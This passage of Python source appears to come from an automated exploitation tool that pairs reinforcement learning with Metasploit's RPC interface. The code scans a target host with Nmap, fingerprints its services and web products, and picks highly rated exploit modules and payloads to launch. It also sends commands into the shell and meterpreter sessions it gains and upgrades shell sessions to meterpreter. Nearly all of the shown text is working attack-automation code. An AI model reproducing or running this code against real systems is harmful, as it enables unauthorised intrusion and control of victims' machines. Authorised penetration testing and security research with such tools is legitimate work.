|
- #!/bin/env python
- # -*- coding: utf-8 -*-
- #%%
- # 载入模块
- import sys
- import os
- import time
- import re
- import copy
- import json
- import csv
- import codecs
- import random
- import ipaddress
- import configparser
- import msgpack
- import http.client
- import threading
- import numpy as np
- import pandas as pd
- import tensorflow as tf
- from bs4 import BeautifulSoup
- from docopt import docopt
- from keras.models import *
- from keras.layers import *
- from keras import backend as K
- from util import Utilty
- from modules.VersionChecker import VersionChecker
- from modules.VersionCheckerML import VersionCheckerML
- from modules.ContentExplorer import ContentExplorer
- from CreateReport import CreateReport
-
-
- # 减少报错信息
- # Warnning for TensorFlow acceleration is not shown.
- os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
-
- # 靶机条件设置
- # Index of target host's state (s).
- ST_OS_TYPE = 0 # OS types (unix, linux, windows, osx..).
- ST_SERV_NAME = 1 # Product name on Port.
- ST_SERV_VER = 2 # Product version.
- ST_MODULE = 3 # Exploit module types.
- ST_TARGET = 4 # target types (0, 1, 2..).
- # ST_STAGE = 5 # exploit's stage (normal, exploitation, post-exploitation).
- NUM_STATES = 5 # Size of state.
- NONE_STATE = None
- NUM_ACTIONS = 0
-
- # 模型奖励设置
- # Reward
- R_GREAT = 10 # Successful of Stager/Stage payload.
- R_GOOD = 1 # Successful of Single payload.
- R_BAD = -1 # Failure of payload.
-
- # Stage of exploitation
- S_NORMAL = -1
- S_EXPLOIT = 0
- S_PEXPLOIT = 1
-
- # Label type of printing.
- OK = 'ok' # [*]
- NOTE = 'note' # [+]
- FAIL = 'fail' # [-]
- WARNING = 'warn' # [!]
- NONE = 'none' # No label.
-
-
- # metasploit交互设置,主要包括条件输入、登陆、登出等信息
- # Metasploit interface.
- class Msgrpc:
- def __init__(self, option=[]):
- self.host = option.get('host') or "127.0.0.1"
- self.port = option.get('port') or 55552
- self.uri = option.get('uri') or "/api/"
- self.ssl = option.get('ssl') or False
- self.authenticated = False
- self.token = False
- self.headers = {"Content-type": "binary/message-pack"}
- if self.ssl:
- self.client = http.client.HTTPSConnection(self.host, self.port)
- else:
- self.client = http.client.HTTPConnection(self.host, self.port)
- self.util = Utilty()
-
- # Read config.ini.
- full_path = os.path.dirname(os.path.abspath(__file__))
- config = configparser.ConfigParser()
- try:
- config.read(os.path.join(full_path, 'config.ini'))
- except FileExistsError as err:
- self.util.print_message(FAIL, 'File exists error: {}'.format(err))
- sys.exit(1)
- # Common setting value.
- self.msgrpc_user = config['Common']['msgrpc_user']
- self.msgrpc_pass = config['Common']['msgrpc_pass']
- self.timeout = int(config['Common']['timeout'])
- self.con_retry = int(config['Common']['con_retry'])
- self.retry_count = 0
- self.console_id = 0
-
- # Call RPC API.
- def call(self, meth, origin_option):
- # Set API option.
- option = copy.deepcopy(origin_option)
- option = self.set_api_option(meth, option)
-
- # Send request.
- resp = self.send_request(meth, option, origin_option)
- return msgpack.unpackb(resp.read())
-
- def set_api_option(self, meth, option):
- if meth != 'auth.login':
- if not self.authenticated:
- self.util.print_message(FAIL, 'MsfRPC: Not Authenticated.')
- exit(1)
- if meth != 'auth.login':
- option.insert(0, self.token)
- option.insert(0, meth)
- return option
-
- # Send HTTP request.
- def send_request(self, meth, option, origin_option):
- params = msgpack.packb(option)
- resp = ''
- try:
- self.client.request("POST", self.uri, params, self.headers)
- resp = self.client.getresponse()
- self.retry_count = 0
- except Exception as err:
- while True:
- self.retry_count += 1
- if self.retry_count == self.con_retry:
- self.util.print_exception(err, 'Retry count is over.')
- exit(1)
- else:
- # Retry.
- self.util.print_message(WARNING, '{}/{} Retry "{}" call. reason: {}'.format(
- self.retry_count, self.con_retry, option[0], err))
- time.sleep(1.0)
- if self.ssl:
- self.client = http.client.HTTPSConnection(self.host, self.port)
- else:
- self.client = http.client.HTTPConnection(self.host, self.port)
- if meth != 'auth.login':
- self.login(self.msgrpc_user, self.msgrpc_pass)
- option = self.set_api_option(meth, origin_option)
- self.get_console()
- resp = self.send_request(meth, option, origin_option)
- break
- return resp
-
- # Log in to RPC Server.
- def login(self, user, password):
- ret = self.call('auth.login', [user, password])
- try:
- if ret.get(b'result') == b'success':
- self.authenticated = True
- self.token = ret.get(b'token')
- return True
- else:
- self.util.print_message(FAIL, 'MsfRPC: Authentication failed.')
- exit(1)
- except Exception as e:
- self.util.print_exception(e, 'Failed: auth.login')
- exit(1)
-
- # Keep alive.
- def keep_alive(self):
- self.util.print_message(OK, 'Executing keep_alive..')
- _ = self.send_command(self.console_id, 'version\n', False)
-
- # Create MSFconsole.
- def get_console(self):
- # Create a console.
- ret = self.call('console.create', [])
- try:
- self.console_id = ret.get(b'id')
- _ = self.call('console.read', [self.console_id])
- except Exception as err:
- self.util.print_exception(err, 'Failed: console.create')
- exit(1)
-
- # Send Metasploit command.
- def send_command(self, console_id, command, visualization, sleep=0.1):
- _ = self.call('console.write', [console_id, command])
- time.sleep(0.5)
- ret = self.call('console.read', [console_id])
- time.sleep(sleep)
- result = ''
- try:
- result = ret.get(b'data').decode('utf-8')
- if visualization:
- self.util.print_message(OK, 'Result of "{}":\n{}'.format(command, result))
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(command))
- return result
-
- # Get all modules.
- def get_module_list(self, module_type):
- ret = {}
- if module_type == 'exploit':
- ret = self.call('module.exploits', [])
- elif module_type == 'auxiliary':
- ret = self.call('module.auxiliary', [])
- elif module_type == 'post':
- ret = self.call('module.post', [])
- elif module_type == 'payload':
- ret = self.call('module.payloads', [])
- elif module_type == 'encoder':
- ret = self.call('module.encoders', [])
- elif module_type == 'nop':
- ret = self.call('module.nops', [])
-
- try:
- byte_list = ret[b'modules']
- string_list = []
- for module in byte_list:
- string_list.append(module.decode('utf-8'))
- return string_list
- except Exception as e:
- self.util.print_exception(e, 'Failed: Getting {} module list.'.format(module_type))
- exit(1)
-
- # Get module detail information.
- def get_module_info(self, module_type, module_name):
- return self.call('module.info', [module_type, module_name])
-
- # Get payload that compatible module.
- def get_compatible_payload_list(self, module_name):
- ret = self.call('module.compatible_payloads', [module_name])
- try:
- byte_list = ret[b'payloads']
- string_list = []
- for module in byte_list:
- string_list.append(module.decode('utf-8'))
- return string_list
- except Exception as e:
- self.util.print_exception(e, 'Failed: module.compatible_payloads.')
- return []
-
- # Get payload that compatible target.
- def get_target_compatible_payload_list(self, module_name, target_num):
- ret = self.call('module.target_compatible_payloads', [module_name, target_num])
- try:
- byte_list = ret[b'payloads']
- string_list = []
- for module in byte_list:
- string_list.append(module.decode('utf-8'))
- return string_list
- except Exception as e:
- self.util.print_exception(e, 'Failed: module.target_compatible_payloads.')
- return []
-
- # Get module options.
- def get_module_options(self, module_type, module_name):
- return self.call('module.options', [module_type, module_name])
-
- # Execute module.
- def execute_module(self, module_type, module_name, options):
- ret = self.call('module.execute', [module_type, module_name, options])
- try:
- job_id = ret[b'job_id']
- uuid = ret[b'uuid'].decode('utf-8')
- return job_id, uuid
- except Exception as e:
- if ret[b'error_code'] == 401:
- self.login(self.msgrpc_user, self.msgrpc_pass)
- else:
- self.util.print_exception(e, 'Failed: module.execute.')
- exit(1)
-
- # Get job list.
- def get_job_list(self):
- jobs = self.call('job.list', [])
- try:
- byte_list = jobs.keys()
- job_list = []
- for job_id in byte_list:
- job_list.append(int(job_id.decode('utf-8')))
- return job_list
- except Exception as e:
- self.util.print_exception(e, 'Failed: job.list.')
- return []
-
- # Get job detail information.
- def get_job_info(self, job_id):
- return self.call('job.info', [job_id])
-
- # Stop job.
- def stop_job(self, job_id):
- return self.call('job.stop', [job_id])
-
- # Get session list.
- def get_session_list(self):
- return self.call('session.list', [])
-
- # Stop session.
- def stop_session(self, session_id):
- _ = self.call('session.stop', [str(session_id)])
-
- # Stop meterpreter session.
- def stop_meterpreter_session(self, session_id):
- _ = self.call('session.meterpreter_session_detach', [str(session_id)])
-
- # Execute shell.
- def execute_shell(self, session_id, cmd):
- ret = self.call('session.shell_write', [str(session_id), cmd])
- try:
- return ret[b'write_count'].decode('utf-8')
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(cmd))
- return 'Failed'
-
- # Get executing shell result.
- def get_shell_result(self, session_id, read_pointer):
- ret = self.call('session.shell_read', [str(session_id), read_pointer])
- try:
- seq = ret[b'seq'].decode('utf-8')
- data = ret[b'data'].decode('utf-8')
- return seq, data
- except Exception as e:
- self.util.print_exception(e, 'Failed: session.shell_read.')
- return 0, 'Failed'
-
- # Execute meterpreter.
- def execute_meterpreter(self, session_id, cmd):
- ret = self.call('session.meterpreter_write', [str(session_id), cmd])
- try:
- return ret[b'result'].decode('utf-8')
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(cmd))
- return 'Failed'
-
- # Execute single meterpreter.
- def execute_meterpreter_run_single(self, session_id, cmd):
- ret = self.call('session.meterpreter_run_single', [str(session_id), cmd])
- try:
- return ret[b'result'].decode('utf-8')
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(cmd))
- return 'Failed'
-
- # Get executing meterpreter result.
- def get_meterpreter_result(self, session_id):
- ret = self.call('session.meterpreter_read', [str(session_id)])
- try:
- return ret[b'data'].decode('utf-8')
- except Exception as e:
- self.util.print_exception(e, 'Failed: session.meterpreter_read')
- return None
-
- # Upgrade shell session to meterpreter.
- def upgrade_shell_session(self, session_id, lhost, lport):
- ret = self.call('session.shell_upgrade', [str(session_id), lhost, lport])
- try:
- return ret[b'result'].decode('utf-8')
- except Exception as e:
- self.util.print_exception(e, 'Failed: session.shell_upgrade')
- return 'Failed'
-
- # Log out from RPC Server.
- def logout(self):
- ret = self.call('auth.logout', [self.token])
- try:
- if ret.get(b'result') == b'success':
- self.authenticated = False
- self.token = ''
- return True
- else:
- self.util.print_message(FAIL, 'MsfRPC: Authentication failed.')
- exit(1)
- except Exception as e:
- self.util.print_exception(e, 'Failed: auth.logout')
- exit(1)
-
- # Disconnection.
- def termination(self, console_id):
- # Kill a console and Log out.
- _ = self.call('console.session_kill', [console_id])
- _ = self.logout()
-
-
- # Metasploit's environment.
- class Metasploit:
- def __init__(self, target_ip='127.0.0.1'):
- self.util = Utilty()
- self.rhost = target_ip
- # Read config.ini.
- full_path = os.path.dirname(os.path.abspath(__file__))
- # ?
- config = configparser.ConfigParser()
- try:
- config.read(os.path.join(full_path, 'config.ini'))
- except FileExistsError as err:
- self.util.print_message(FAIL, 'File exists error: {}'.format(err))
- sys.exit(1)
- # Common setting value.
- server_host = config['Common']['server_host']
- server_port = int(config['Common']['server_port'])
- self.msgrpc_user = config['Common']['msgrpc_user']
- self.msgrpc_pass = config['Common']['msgrpc_pass']
- self.timeout = int(config['Common']['timeout'])
- self.max_attempt = int(config['Common']['max_attempt'])
- self.save_path = os.path.join(full_path, config['Common']['save_path'])
- self.save_file = os.path.join(self.save_path, config['Common']['save_file'])
- self.data_path = os.path.join(full_path, config['Common']['data_path'])
- if os.path.exists(self.data_path) is False:
- os.mkdir(self.data_path)
- self.plot_file = os.path.join(self.data_path, config['Common']['plot_file'])
- self.port_div_symbol = config['Common']['port_div']
-
- # Metasploit options setting value.
- self.lhost = server_host
- self.lport = int(config['Metasploit']['lport'])
- self.proxy_host = config['Metasploit']['proxy_host']
- self.proxy_port = int(config['Metasploit']['proxy_port'])
- self.prohibited_list = str(config['Metasploit']['prohibited_list']).split('@')
- self.path_collection = str(config['Metasploit']['path_collection']).split('@')
-
- # Nmap options setting value.
- self.nmap_command = config['Nmap']['command']
- self.nmap_timeout = config['Nmap']['timeout']
- self.nmap_2nd_command = config['Nmap']['second_command']
- self.nmap_2nd_timeout = config['Nmap']['second_timeout']
-
- # A3C setting value.
- self.train_worker_num = int(config['A3C']['train_worker_num'])
- self.train_max_num = int(config['A3C']['train_max_num'])
- self.train_max_steps = int(config['A3C']['train_max_steps'])
- self.train_tmax = int(config['A3C']['train_tmax'])
- self.test_worker_num = int(config['A3C']['test_worker_num'])
- self.greedy_rate = float(config['A3C']['greedy_rate'])
- self.eps_steps = int(self.train_max_num * self.greedy_rate)
-
- # State setting value.
- self.state = [] # Deep Exploit's state(s).
- self.os_type = str(config['State']['os_type']).split('@') # OS type.
- self.os_real = len(self.os_type) - 1
- self.service_list = str(config['State']['services']).split('@') # Product name.
-
- # Report setting value.
- self.report_test_path = os.path.join(full_path, config['Report']['report_test'])
- self.report_train_path = os.path.join(self.report_test_path, config['Report']['report_train'])
- if os.path.exists(self.report_train_path) is False:
- os.mkdir(self.report_train_path)
- self.scan_start_time = self.util.get_current_date()
- self.source_host= server_host
-
- self.client = Msgrpc({'host': server_host, 'port': server_port}) # Create Msgrpc instance.
- self.client.login(self.msgrpc_user, self.msgrpc_pass) # Log in to RPC Server.
- self.client.get_console() # Get MSFconsole ID.
- self.buffer_seq = 0
- self.isPostExploit = False # Executing Post-Exploiting True/False.
-
- # Create exploit tree.
- def get_exploit_tree(self):
- self.util.print_message(NOTE, 'Get exploit tree.')
- exploit_tree = {}
- if os.path.exists(os.path.join(self.data_path, 'exploit_tree.json')) is False:
- for idx, exploit in enumerate(com_exploit_list):
- temp_target_tree = {'targets': []}
- temp_tree = {}
- # Set exploit module.
- use_cmd = 'use exploit/' + exploit + '\n'
- _ = self.client.send_command(self.client.console_id, use_cmd, False)
-
- # Get target.
- show_cmd = 'show targets\n'
- target_info = ''
- time_count = 0
- while True:
- target_info = self.client.send_command(self.client.console_id, show_cmd, False)
- if 'Exploit targets' in target_info:
- break
- if time_count == 5:
- self.util.print_message(OK, 'Timeout: {0}'.format(show_cmd))
- self.util.print_message(OK, 'No exist Targets.')
- break
- time.sleep(1.0)
- time_count += 1
- target_list = self.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info)
- for target in target_list:
- # Get payload list.
- payload_list = self.client.get_target_compatible_payload_list(exploit, int(target))
- temp_tree[target] = payload_list
-
- # Get options.
- options = self.client.get_module_options('exploit', exploit)
- key_list = options.keys()
- option = {}
- for key in key_list:
- sub_option = {}
- sub_key_list = options[key].keys()
- for sub_key in sub_key_list:
- if isinstance(options[key][sub_key], list):
- end_option = []
- for end_key in options[key][sub_key]:
- end_option.append(end_key.decode('utf-8'))
- sub_option[sub_key.decode('utf-8')] = end_option
- else:
- end_option = {}
- if isinstance(options[key][sub_key], bytes):
- sub_option[sub_key.decode('utf-8')] = options[key][sub_key].decode('utf-8')
- else:
- sub_option[sub_key.decode('utf-8')] = options[key][sub_key]
-
- # User specify.
- sub_option['user_specify'] = ""
- option[key.decode('utf-8')] = sub_option
-
- # Add payloads and targets to exploit tree.
- temp_target_tree['target_list'] = target_list
- temp_target_tree['targets'] = temp_tree
- temp_target_tree['options'] = option
- exploit_tree[exploit] = temp_target_tree
- # Output processing status to console.
- self.util.print_message(OK, '{}/{} exploit:{}, targets:{}'.format(str(idx + 1),
- len(com_exploit_list),
- exploit,
- len(target_list)))
-
- # Save exploit tree to local file.
- fout = codecs.open(os.path.join(self.data_path, 'exploit_tree.json'), 'w', 'utf-8')
- json.dump(exploit_tree, fout, indent=4)
- fout.close()
- self.util.print_message(OK, 'Saved exploit tree.')
- else:
- # Get exploit tree from local file.
- local_file = os.path.join(self.data_path, 'exploit_tree.json')
- self.util.print_message(OK, 'Loaded exploit tree from : {}'.format(local_file))
- fin = codecs.open(local_file, 'r', 'utf-8')
- exploit_tree = json.loads(fin.read().replace('\0', ''))
- fin.close()
- return exploit_tree
-
- # Get target host information.
- def get_target_info(self, rhost, proto_list, port_info):
- self.util.print_message(NOTE, 'Get target info.')
- target_tree = {}
- if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False:
- # Examination product and version on the Web ports.
- path_list = ['' for idx in range(len(com_port_list))]
- # TODO: Crawling on the Post-Exploitation phase.
- if self.isPostExploit is False:
- # Create instances.
- version_checker = VersionChecker(self.util)
- version_checker_ml = VersionCheckerML(self.util)
- content_explorer = ContentExplorer(self.util)
-
- # Check web port.
- web_port_list = self.util.check_web_port(rhost, com_port_list, self.client)
-
- # Gather target url using Spider.
- web_target_info = self.util.run_spider(rhost, web_port_list, self.client)
-
- # Get HTTP responses and check products per web port.
- uniq_product = []
- for idx_target, target in enumerate(web_target_info):
- web_prod_list = []
- # Scramble.
- target_list = target[2]
- if self.util.is_scramble is True:
- self.util.print_message(WARNING, 'Scramble target list.')
- target_list = random.sample(target[2], len(target[2]))
-
- # Cutting target url counts.
- if self.util.max_target_url != 0 and self.util.max_target_url < len(target_list):
- self.util.print_message(WARNING, 'Cutting target list {} to {}.'
- .format(len(target[2]), self.util.max_target_url))
- target_list = target_list[:self.util.max_target_url]
-
- # Identify product name/version per target url.
- for count, target_url in enumerate(target_list):
- self.util.print_message(NOTE, '{}/{} Start analyzing: {}'
- .format(count + 1, len(target_list), target_url))
- self.client.keep_alive()
-
- # Check target url.
- parsed = util.parse_url(target_url)
- if parsed is None:
- continue
-
- # Get HTTP response (header + body).
- _, res_header, res_body = self.util.send_request('GET', target_url)
-
- # Cutting response byte.
- if self.util.max_target_byte != 0 and (self.util.max_target_byte < len(res_body)):
- self.util.print_message(WARNING, 'Cutting response byte {} to {}.'
- .format(len(res_body), self.util.max_target_byte))
- res_body = res_body[:self.util.max_target_byte]
-
- # Check product name/version using signature.
- web_prod_list.extend(version_checker.get_product_name(parsed,
- res_header + res_body,
- self.client))
-
- # Check product name/version using Machine Learning.
- web_prod_list.extend(version_checker_ml.get_product_name(parsed,
- res_header + res_body,
- self.client))
-
- # Check product name/version using default contents.
- parsed = None
- try:
- parsed = util.parse_url(target[0])
- except Exception as e:
- self.util.print_exception(e, 'Parsed error : {}'.format(target[0]))
- continue
- web_prod_list.extend(content_explorer.content_explorer(parsed, target[0], self.client))
-
- # Delete duplication.
- tmp_list = []
- for item in list(set(web_prod_list)):
- tmp_item = item.split('@')
- tmp = tmp_item[0] + ' ' + tmp_item[1] + ' ' + tmp_item[2]
- if tmp not in tmp_list:
- tmp_list.append(tmp)
- uniq_product.append(item)
-
- # Assemble web product information.
- for idx, web_prod in enumerate(uniq_product):
- web_item = web_prod.split('@')
- proto_list.append('tcp')
- port_info.append(web_item[0] + ' ' + web_item[1])
- com_port_list.append(web_item[2] + self.port_div_symbol + str(idx))
- path_list.append(web_item[3])
-
- # Create target info.
- target_tree = {'rhost': rhost, 'os_type': self.os_real}
- for port_idx, port_num in enumerate(com_port_list):
- temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'target_path': '', 'exploit': []}
-
- # Get product name.
- service_name = 'unknown'
- for (idx, service) in enumerate(self.service_list):
- if service in port_info[port_idx].lower():
- service_name = service
- break
- temp_tree['prod_name'] = service_name
-
- # Get product version.
- # idx=1 2.3.4, idx=2 4.7p1, idx=3 1.0.1f, idx4 2.0 or v1.3 idx5 3.X
- regex_list = [r'.*\s(\d{1,3}\.\d{1,3}\.\d{1,3}).*',
- r'.*\s[a-z]?(\d{1,3}\.\d{1,3}[a-z]\d{1,3}).*',
- r'.*\s[\w]?(\d{1,3}\.\d{1,3}\.\d[a-z]{1,3}).*',
- r'.*\s[a-z]?(\d\.\d).*',
- r'.*\s(\d\.[xX|\*]).*']
- version = 0.0
- output_version = 0.0
- for (idx, regex) in enumerate(regex_list):
- version_raw = self.cutting_strings(regex, port_info[port_idx])
- if len(version_raw) == 0:
- continue
- if idx == 0:
- index = version_raw[0].rfind('.')
- version = version_raw[0][:index] + version_raw[0][index + 1:]
- output_version = version_raw[0]
- break
- elif idx == 1:
- index = re.search(r'[a-z]', version_raw[0]).start()
- version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:]
- output_version = version_raw[0]
- break
- elif idx == 2:
- index = re.search(r'[a-z]', version_raw[0]).start()
- version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:]
- index = version.rfind('.')
- version = version_raw[0][:index] + version_raw[0][index:]
- output_version = version_raw[0]
- break
- elif idx == 3:
- version = self.cutting_strings(r'[a-z]?(\d\.\d)', version_raw[0])
- version = version[0]
- output_version = version_raw[0]
- break
- elif idx == 4:
- version = version_raw[0].replace('X', '0').replace('x', '0').replace('*', '0')
- version = version[0]
- output_version = version_raw[0]
- temp_tree['version'] = float(version)
-
- # Get protocol type.
- temp_tree['protocol'] = proto_list[port_idx]
-
- if path_list is not None:
- temp_tree['target_path'] = path_list[port_idx]
-
- # Get exploit module.
- module_list = []
- raw_module_info = ''
- idx = 0
- search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
- raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0)
- module_list = self.extract_osmatch_module(self.cutting_strings(r'(exploit/.*)', raw_module_info))
- if service_name != 'unknown' and len(module_list) == 0:
- self.util.print_message(WARNING, 'Can\'t load exploit module: {}'.format(service_name))
- temp_tree['prod_name'] = 'unknown'
-
- for module in module_list:
- if module[1] in {'excellent', 'great', 'good'}:
- temp_tree['exploit'].append(module[0])
- target_tree[str(port_num)] = temp_tree
-
- # Output processing status to console.
- self.util.print_message(OK, 'Analyzing port {}/{}, {}/{}, '
- 'Available exploit modules:{}'.format(port_num,
- temp_tree['protocol'],
- temp_tree['prod_name'],
- output_version,
- len(temp_tree['exploit'])))
-
- # Save target host information to local file.
- fout = codecs.open(os.path.join(self.data_path, 'target_info_' + rhost + '.json'), 'w', 'utf-8')
- json.dump(target_tree, fout, indent=4)
- fout.close()
- self.util.print_message(OK, 'Saved target tree.')
- else:
- # Get target host information from local file.
- saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json')
- self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file))
- fin = codecs.open(saved_file, 'r', 'utf-8')
- target_tree = json.loads(fin.read().replace('\0', ''))
- fin.close()
-
- return target_tree
-
- # Get target host information for indicate port number.
- def get_target_info_indicate(self, rhost, proto_list, port_info, port=None, prod_name=None):
- self.util.print_message(NOTE, 'Get target info for indicate port number.')
- target_tree = {'origin_port': port}
-
- # Update "com_port_list".
- com_port_list = []
- for prod in prod_name.split('@'):
- temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'exploit': []}
- virtual_port = str(np.random.randint(999999999))
- com_port_list.append(virtual_port)
-
- # Get product name.
- service_name = 'unknown'
- for (idx, service) in enumerate(self.service_list):
- if service == prod.lower():
- service_name = service
- break
- temp_tree['prod_name'] = service_name
-
- # Get product version.
- temp_tree['version'] = float(0.0)
-
- # Get protocol type.
- temp_tree['protocol'] = 'tcp'
-
- # Get exploit module.
- module_list = []
- raw_module_info = ''
- idx = 0
- search_cmd = 'search name:' + service_name + ' type:exploit app:server\n'
- raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0)
- module_list = self.cutting_strings(r'(exploit/.*)', raw_module_info)
- if service_name != 'unknown' and len(module_list) == 0:
- continue
- for exploit in module_list:
- raw_exploit_info = exploit.split(' ')
- exploit_info = list(filter(lambda s: s != '', raw_exploit_info))
- if exploit_info[2] in {'excellent', 'great', 'good'}:
- temp_tree['exploit'].append(exploit_info[0])
- target_tree[virtual_port] = temp_tree
-
- # Output processing status to console.
- self.util.print_message(OK, 'Analyzing port {}/{}, {}, '
- 'Available exploit modules:{}'.format(port,
- temp_tree['protocol'],
- temp_tree['prod_name'],
- len(temp_tree['exploit'])))
-
- # Save target host information to local file.
- with codecs.open(os.path.join(self.data_path, 'target_info_indicate_' + rhost + '.json'), 'w', 'utf-8') as fout:
- json.dump(target_tree, fout, indent=4)
-
- return target_tree, com_port_list
-
- # Get target OS name.
- def extract_osmatch_module(self, module_list):
- osmatch_module_list = []
- for module in module_list[:-2]:
- raw_exploit_info = module.split(' ')
- exploit_info = list(filter(lambda s: s != '', raw_exploit_info))
- os_type = exploit_info[0].split('/')[1]
- if self.os_real == 0 and os_type in ['windows', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 1 and os_type in ['unix', 'freebsd', 'bsdi', 'linux', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 2 and os_type in ['solaris', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 3 and os_type in ['osx', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 4 and os_type in ['netware', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 5 and os_type in ['linux', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 6 and os_type in ['irix', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 7 and os_type in ['hpux', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 8 and os_type in ['freebsd', 'unix', 'bsdi', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 9 and os_type in ['firefox', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 10 and os_type in ['dialup', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 11 and os_type in ['bsdi', 'unix', 'freebsd', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 12 and os_type in ['apple_ios', 'unix', 'osx', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 13 and os_type in ['android', 'linux', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 14 and os_type in ['aix', 'unix', 'multi']:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- elif self.os_real == 15:
- osmatch_module_list.append([exploit_info[0], exploit_info[2]])
- return osmatch_module_list
-
- # Parse.
- def cutting_strings(self, pattern, target):
- return re.findall(pattern, target)
-
- # Normalization.
- def normalization(self, target_idx):
- if target_idx == ST_OS_TYPE:
- os_num = int(self.state[ST_OS_TYPE])
- os_num_mean = len(self.os_type) / 2
- self.state[ST_OS_TYPE] = (os_num - os_num_mean) / os_num_mean
- if target_idx == ST_SERV_NAME:
- service_num = self.state[ST_SERV_NAME]
- service_num_mean = len(self.service_list) / 2
- self.state[ST_SERV_NAME] = (service_num - service_num_mean) / service_num_mean
- elif target_idx == ST_MODULE:
- prompt_num = self.state[ST_MODULE]
- prompt_num_mean = len(com_exploit_list) / 2
- self.state[ST_MODULE] = (prompt_num - prompt_num_mean) / prompt_num_mean
-
- # Execute Nmap.
- def execute_nmap(self, rhost, command, timeout):
- self.util.print_message(NOTE, 'Execute Nmap against {}'.format(rhost))
- if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False:
- # Execute Nmap.
- self.util.print_message(OK, '{}'.format(command))
- self.util.print_message(OK, 'Start time: {}'.format(self.util.get_current_date()))
- _ = self.client.call('console.write', [self.client.console_id, command])
-
- time.sleep(3.0)
- time_count = 0
- while True:
- # Judgement of Nmap finishing.
- ret = self.client.call('console.read', [self.client.console_id])
- try:
- if (time_count % 5) == 0:
- self.util.print_message(OK, 'Port scanning: {} [Elapsed time: {} s]'.format(rhost, time_count))
- self.client.keep_alive()
- if timeout == time_count:
- self.client.termination(self.client.console_id)
- self.util.print_message(OK, 'Timeout : {}'.format(command))
- self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date()))
- break
-
- status = ret.get(b'busy')
- if status is False:
- self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date()))
- time.sleep(5.0)
- break
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(command))
- time.sleep(1.0)
- time_count += 1
-
- _ = self.client.call('console.destroy', [self.client.console_id])
- ret = self.client.call('console.create', [])
- try:
- self.client.console_id = ret.get(b'id')
- except Exception as e:
- self.util.print_exception(e, 'Failed: console.create')
- exit(1)
- _ = self.client.call('console.read', [self.client.console_id])
- else:
- self.util.print_message(OK, 'Nmap already scanned.')
-
- # Get port list from Nmap's XML result.
- def get_port_list(self, nmap_result_file, rhost):
- self.util.print_message(NOTE, 'Get port list from {}.'.format(nmap_result_file))
- global com_port_list
- port_list = []
- proto_list = []
- info_list = []
- if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False:
- nmap_result = ''
- cat_cmd = 'cat ' + nmap_result_file + '\n'
- _ = self.client.call('console.write', [self.client.console_id, cat_cmd])
- time.sleep(3.0)
- time_count = 0
- while True:
- # Judgement of 'services' command finishing.
- ret = self.client.call('console.read', [self.client.console_id])
-
- try:
- if self.timeout == time_count:
- self.client.termination(self.client.console_id)
- self.util.print_message(OK, 'Timeout: "{}"'.format(cat_cmd))
- break
-
- nmap_result += ret.get(b'data').decode('utf-8')
-
- status = ret.get(b'busy')
- if status is False:
- break
- except Exception as e:
- self.util.print_exception(e, 'Failed: console.read')
- time.sleep(1.0)
- time_count += 1
-
- # Get port, protocol, information from XML file.
- port_list = []
- proto_list = []
- info_list = []
- if os.path.exists(nmap_result_file):
- nmap_result = open(nmap_result_file, 'rb').read()
- bs = BeautifulSoup(nmap_result, 'lxml')
- ports = bs.find_all('port')
- for idx, port in enumerate(ports):
- port_list.append(str(port.attrs['portid']))
- proto_list.append(port.attrs['protocol'])
-
- for obj_child in port.contents:
- if obj_child.name == 'service':
- temp_info = ''
- if 'product' in obj_child.attrs:
- temp_info += obj_child.attrs['product'] + ' '
- if 'version' in obj_child.attrs:
- temp_info += obj_child.attrs['version'] + ' '
- if 'extrainfo' in obj_child.attrs:
- temp_info += obj_child.attrs['extrainfo']
- if temp_info != '':
- info_list.append(temp_info)
- else:
- info_list.append('unknown')
- break
- else:
- info_list.append('unknown')
- # Display getting port information.
- self.util.print_message(OK, 'Getting {}/{} info: {}'.format(str(port.attrs['portid']),
- port.attrs['protocol'],
- info_list[idx]))
-
